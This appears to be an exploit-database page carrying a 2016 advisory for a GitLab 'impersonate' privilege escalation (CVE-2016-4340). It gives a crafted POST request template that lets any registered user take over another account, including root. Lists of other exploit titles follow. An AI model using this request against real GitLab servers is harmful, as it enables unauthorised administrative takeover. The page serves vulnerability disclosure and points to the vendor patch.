Menu

Search for hundreds of thousands of exploits

"GitLab - 'impersonate' Feature Privilege Escalation"

Author

Exploit author

Kaimi

Platform

Exploit platform

ruby

Release date

Exploit published date

2016-08-15

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Exploit Title: GitLab privilege escalation via "impersonate" feature
# Date: 02-05-2016
# Software Link: https://about.gitlab.com/
# Version: 8.2.0 - 8.2.4, 8.3.0 - 8.3.8, 8.4.0 - 8.4.9, 8.5.0 - 8.5.11, 8.6.0 - 8.6.7, 8.7.0
# Exploit Author: Kaimi
# Website: https://kaimi.ru
# CVE: CVE-2016-4340
# Category: webapps
 
1. Description
   
Any registered user can "log in" as any other user, including administrators.
 
https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/
 
   
2. Proof of Concept
 
Login as regular user.
Get current authenticity token by observing any POST-request (ex.: change any info in user profile).

Craft request using this as template:
 
POST /admin/users/stop_impersonation?id=root
. . .

_method=delete&authenticity_token=lqyOBt5U%2F0%2BPM2i%2BGDx3zaVjGgAqHzoteQ15FnrQ3E8%3D

Where 'root' - desired user. 'authenticity_token' - token obtained on the previous step.

   
3. Solution:

Use officialy provided solutions:
https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gitlab 12.9.0 - Arbitrary File Read (Authenticated)" webapps ruby "Jasper Rasenberg"
2020-07-26 "Rails 5.0.1 - Remote Code Execution" webapps ruby "Lucas Amorim"
2020-05-06 "GitLab 12.9.0 - Arbitrary File Read" webapps ruby KouroshRZ
2018-10-15 "AlchemyCMS 4.1 - Cross-Site Scripting" webapps ruby "Ismail Tasdelen"
2018-10-12 "CAMALEON CMS 2.4 - Cross-Site Scripting" webapps ruby "Ismail Tasdelen"
2018-05-02 "Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)" remote ruby Metasploit
2018-05-02 "Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)" remote ruby Metasploit
2017-12-02 "Ruby < 2.2.8 / < 2.3.5 / < 2.4.2 / < 2.5.0-preview1 - 'NET::Ftp' Command Injection" local ruby "Etienne Stalmans"
2017-08-30 "Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery" webapps ruby "Dhiraj Mishra"
2017-03-15 "GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution" webapps ruby iblue
Release Date Title Type Platform Author
2019-01-02 "WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection" webapps php Kaimi
2018-12-27 "WordPress Plugin Audio Record 1.0 - Arbitrary File Upload" webapps php Kaimi
2018-12-27 "WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload" webapps php Kaimi
2018-12-11 "WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection" webapps php Kaimi
2017-06-01 "CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities" webapps php Kaimi
2016-08-15 "GitLab - 'impersonate' Feature Privilege Escalation" webapps ruby Kaimi 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected